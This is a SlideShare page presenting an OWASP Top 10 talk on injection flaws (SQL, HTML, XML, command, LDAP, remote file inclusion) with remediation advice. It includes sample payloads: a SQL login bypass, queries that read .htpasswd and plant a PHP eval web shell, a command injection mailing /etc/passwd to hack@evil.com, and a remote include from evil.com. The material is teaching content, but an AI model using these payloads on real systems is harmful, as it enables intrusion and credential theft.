Michael Hendrickx, profile picture
Uploaded byMichael Hendrickx
PPTX, PDF10,213 views

Owasp Top 10 A1: Injection

This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.

Technology
Related topics:
IT Security

Embed presentation

Downloaded 1,895 times
Owasp A1: Injection 31 March 2014: Dubai, UAE
About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
• Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
Injection Fails Mix of “data” and “commands”.
IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.
Thank you! Michael Hendrickx me@michaelhendrickx.com @ndrix

More Related Content

PPTX
Security Code Review 101
byPaul Ionescu
 
PPTX
Web application vulnerability assessment
byRavikumar Paghdal
 
PDF
Owasp top 10
byYasserElsnbary
 
PPTX
Web application security
byKapil Sharma
 
PPTX
The OWASP Zed Attack Proxy
byAditya Gupta
 
PPTX
OWASP TOP 10 VULNERABILITIS
byNull Bhubaneswar
 
PPTX
security misconfigurations
byMegha Sahu
 
PPTX
Server-side template injection- Slides
byAmit Dubey
 
Security Code Review 101
byPaul Ionescu
 
Web application vulnerability assessment
byRavikumar Paghdal
 
Owasp top 10
byYasserElsnbary
 
Web application security
byKapil Sharma
 
The OWASP Zed Attack Proxy
byAditya Gupta
 
OWASP TOP 10 VULNERABILITIS
byNull Bhubaneswar
 
security misconfigurations
byMegha Sahu
 
Server-side template injection- Slides
byAmit Dubey
 

What's hot

PPT
SQL Injection
byAdhoura Academy
 
PPTX
Sql injection
byZidh
 
PDF
OWASP Top 10 Web Application Vulnerabilities
bySoftware Guru
 
PDF
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
PPTX
Vulnerabilities in modern web applications
byNiyas Nazar
 
PDF
Burp suite
byYashar Shahinzadeh
 
PPT
Cross Site Request Forgery Vulnerabilities
byMarco Morana
 
ODP
OWASP Secure Coding
bybilcorry
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
PPTX
API Security Fundamentals
byJosé Haro Peralta
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PPTX
Cross Site Scripting Defense Presentation
byIkhade Maro Igbape
 
PPTX
Deep dive into ssrf
byn|u - The Open Security Community
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PPTX
WTF is Penetration Testing v.2
byScott Sutherland
 
PDF
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
byLenur Dzhemiliev
 
PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PDF
Cross site scripting attacks and defenses
byMohammed A. Imran
 
PDF
Broken access controls
byAkansha Kesharwani
 
PDF
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
byHackIT Ukraine
 
SQL Injection
byAdhoura Academy
 
Sql injection
byZidh
 
OWASP Top 10 Web Application Vulnerabilities
bySoftware Guru
 
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
Vulnerabilities in modern web applications
byNiyas Nazar
 
Burp suite
byYashar Shahinzadeh
 
Cross Site Request Forgery Vulnerabilities
byMarco Morana
 
OWASP Secure Coding
bybilcorry
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
API Security Fundamentals
byJosé Haro Peralta
 
Attacking thru HTTP Host header
bySergey Belov
 
Cross Site Scripting Defense Presentation
byIkhade Maro Igbape
 
Deep dive into ssrf
byn|u - The Open Security Community
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
WTF is Penetration Testing v.2
byScott Sutherland
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
byLenur Dzhemiliev
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
Cross site scripting attacks and defenses
byMohammed A. Imran
 
Broken access controls
byAkansha Kesharwani
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
byHackIT Ukraine
 

Similar to Owasp Top 10 A1: Injection

PPTX
OWASP Top 10 - Day 1 - A1 injection attacks
byMohamed Talaat
 
PPTX
Sql Injection attacks and prevention
byhelloanand
 
PPTX
Web application security part 01
byPrachi Gulihar
 
PDF
Attques web
byTarek MOHAMED
 
PDF
My app is secure... I think
byWim Godden
 
PPT
Php Security By Mugdha And Anish
byOSSCube
 
PDF
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
byIvan Ortega
 
PDF
sql-inj_attack.pdf
byssuser07cf8b
 
ODP
Security In PHP Applications
byAditya Mooley
 
PPT
Advanced sql injection
bybadhanbd
 
PDF
The top 10 security issues in web applications
byDevnology
 
PDF
null Bangalore meet - Php Security
byn|u - The Open Security Community
 
PDF
Lets Make our Web Applications Secure
byAryashree Pritikrishna
 
PDF
Web Security 101
byMichael Peters
 
PPTX
Secure Programming In Php
byAkash Mahajan
 
PPTX
Application and Website Security -- Fundamental Edition
byDaniel Owens
 
PPSX
Web application security
bywww.netgains.org
 
PDF
20111204 web security_livshits_lecture01
byComputer Science Club
 
PDF
Web Application Security
bySiarhei Barysiuk
 
PDF
Owasp Backend Security Project 1.0beta
bySecurity Date
 
OWASP Top 10 - Day 1 - A1 injection attacks
byMohamed Talaat
 
Sql Injection attacks and prevention
byhelloanand
 
Web application security part 01
byPrachi Gulihar
 
Attques web
byTarek MOHAMED
 
My app is secure... I think
byWim Godden
 
Php Security By Mugdha And Anish
byOSSCube
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
byIvan Ortega
 
sql-inj_attack.pdf
byssuser07cf8b
 
Security In PHP Applications
byAditya Mooley
 
Advanced sql injection
bybadhanbd
 
The top 10 security issues in web applications
byDevnology
 
null Bangalore meet - Php Security
byn|u - The Open Security Community
 
Lets Make our Web Applications Secure
byAryashree Pritikrishna
 
Web Security 101
byMichael Peters
 
Secure Programming In Php
byAkash Mahajan
 
Application and Website Security -- Fundamental Edition
byDaniel Owens
 
Web application security
bywww.netgains.org
 
20111204 web security_livshits_lecture01
byComputer Science Club
 
Web Application Security
bySiarhei Barysiuk
 
Owasp Backend Security Project 1.0beta
bySecurity Date
 

More from Michael Hendrickx

PPTX
Owasp Top 10 A3: Cross Site Scripting (XSS)
byMichael Hendrickx
 
PPTX
Social Engineering - Help AG spotlight 15Q2
byMichael Hendrickx
 
PPTX
Help AG spot light - social engineering
byMichael Hendrickx
 
PPTX
The Cross Window redirect
byMichael Hendrickx
 
PPTX
ECrime presentation - A few bits about malware
byMichael Hendrickx
 
PPTX
Social Engineering Trickx - Owasp Doha 2015
byMichael Hendrickx
 
PDF
Webpage Proxying
byMichael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
byMichael Hendrickx
 
Social Engineering - Help AG spotlight 15Q2
byMichael Hendrickx
 
Help AG spot light - social engineering
byMichael Hendrickx
 
The Cross Window redirect
byMichael Hendrickx
 
ECrime presentation - A few bits about malware
byMichael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
byMichael Hendrickx
 
Webpage Proxying
byMichael Hendrickx
 

Recently uploaded

PDF
The year in review - MarvelClient in 2025
bypanagenda
 
PDF
Guided Substation Engineering with CoMPAS: Simplifying IEC 61850
byDanBrown980551
 
PDF
Safeguarding AI-Based Financial Infrastructure
byYasir Naveed Riaz
 
PDF
Security Technologys: Access Control, Firewall, VPN
byShielaLasala
 
PDF
Igniting the Future: Copilot trends, agentic transformation and product roadm...
byUni Systems S.M.S.A.
 
PDF
Agentic Automation for Testers – A Hands-On Deep Dive
byUiPathCommunity
 
PDF
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
PDF
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
PDF
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
PPTX
The Future of IT Service Management AI Automation & Beyond.pptx
byChetu
 
PPTX
Ethics in AI - Artificial Intelligence Fundamentals.pptx
byemenyiblessing
 
PDF
How Mobile Apps Are Shaping the Future of Digital Innovation
byWilliam Taylor
 
PDF
eResource Scheduler Enterprise Resource Management and Scheduling Software.pdf
byeResource Scheduler
 
PDF
Innovative AI Solutions for Business Growth.pdf
byVox Works
 
PDF
The Ultimate Guide to Problem Management Dashboards for IT Teams.pdf
byomnex systems
 
PDF
Top 7 Manufacturing Software for Small Businesses Boosting Growth in 2025
byEnvertis Software Solutions
 
PDF
TPPmark2025 Kenta Inoue's answer 12/04/2025
byKenta Inoue
 
PDF
AI Technology important knowledge ......
byutkarshj2007
 
PDF
Greetings All Students Update 3 by Mia Corp
by©LDMMIA, ©Reiki Yoga
 
PDF
8 LLM Surveys https://tinyurl.com/bdz8e6fp
byBob Marcus
 
The year in review - MarvelClient in 2025
bypanagenda
 
Guided Substation Engineering with CoMPAS: Simplifying IEC 61850
byDanBrown980551
 
Safeguarding AI-Based Financial Infrastructure
byYasir Naveed Riaz
 
Security Technologys: Access Control, Firewall, VPN
byShielaLasala
 
Igniting the Future: Copilot trends, agentic transformation and product roadm...
byUni Systems S.M.S.A.
 
Agentic Automation for Testers – A Hands-On Deep Dive
byUiPathCommunity
 
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
The Future of IT Service Management AI Automation & Beyond.pptx
byChetu
 
Ethics in AI - Artificial Intelligence Fundamentals.pptx
byemenyiblessing
 
How Mobile Apps Are Shaping the Future of Digital Innovation
byWilliam Taylor
 
eResource Scheduler Enterprise Resource Management and Scheduling Software.pdf
byeResource Scheduler
 
Innovative AI Solutions for Business Growth.pdf
byVox Works
 
The Ultimate Guide to Problem Management Dashboards for IT Teams.pdf
byomnex systems
 
Top 7 Manufacturing Software for Small Businesses Boosting Growth in 2025
byEnvertis Software Solutions
 
TPPmark2025 Kenta Inoue's answer 12/04/2025
byKenta Inoue
 
AI Technology important knowledge ......
byutkarshj2007
 
Greetings All Students Update 3 by Mia Corp
by©LDMMIA, ©Reiki Yoga
 
8 LLM Surveys https://tinyurl.com/bdz8e6fp
byBob Marcus
 
In this document
Powered by AI

Introduction to OWASP A1: Injection as a critical vulnerability. OWASP Top 10 listing highlighting the significance of injection vulnerabilities.

Examples of significant losses due to injection attacks, including theft of $100,000 and breaches of Adobe and Yahoo user accounts.

Explanation of injection, its types (SQL, XML, Command), and the complexity introduced in web applications leading to security risks.

In-depth look at SQL injection techniques, including how attackers can manipulate queries to access sensitive data or execute harmful commands.

Discussion on various types of injection attacks including SQL, HTML, XML, Command, LDAP, and Remote File Injection with examples.

Recommendations for preventing injection attacks, including using WAFs, validating input, adopting least privilege policies, and securing coding practices.Summary emphasizing the importance of not trusting user input and the need for secure coding and monitoring, concluding with speaker information.

Owasp Top 10 A1: Injection

  • 1.
    Owasp A1: Injection 31March 2014: Dubai, UAE
  • 2.
    About Me • Whoam I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
  • 3.
    • Owasp Top10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
  • 4.
    How bad isit? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
  • 5.
    What is Injection? •Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
  • 6.
    Injection analogy • Acase is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
  • 7.
    Injection Fails Mix of“data” and “commands”.
  • 8.
    IT underlying technology? •A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
  • 9.
    SQL Injection • Dynamicscript to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
  • 10.
    SQL Injection • Insertvalue with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 11.
    SQL Injection • Insertvalue with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 12.
    SQL Injection • Insertvalue with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
  • 13.
    SQL Injection • Moreadvanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
  • 14.
    SQL Injection • Writefiles – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
  • 15.
    SQL Injection: SQLMap •SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
  • 16.
    HTML Injection • Possibleto include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
  • 17.
    HTML Injection • Possibleto insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
  • 18.
    XML Injection • Webapp talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
  • 19.
    XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0”encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
  • 20.
    Command Injection • Webapplication performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
  • 21.
    Command Injection • Dynamicscript to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
  • 22.
    LDAP Injection • LightweightDirectory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
  • 23.
    LDAP Injection • Insertspecial characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
  • 24.
    Remote File Injection •Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
  • 25.
    Remote File Injection •Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
  • 26.
    Remote File Injection •Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
  • 27.
    Remediation • Implement WebApplication Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
  • 28.
    Remediation • Validate userinput, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
  • 29.
    Remediation • Adopt least-privilegepolicies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
  • 30.
    Summary • Don’t trustyour user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.
  • 31.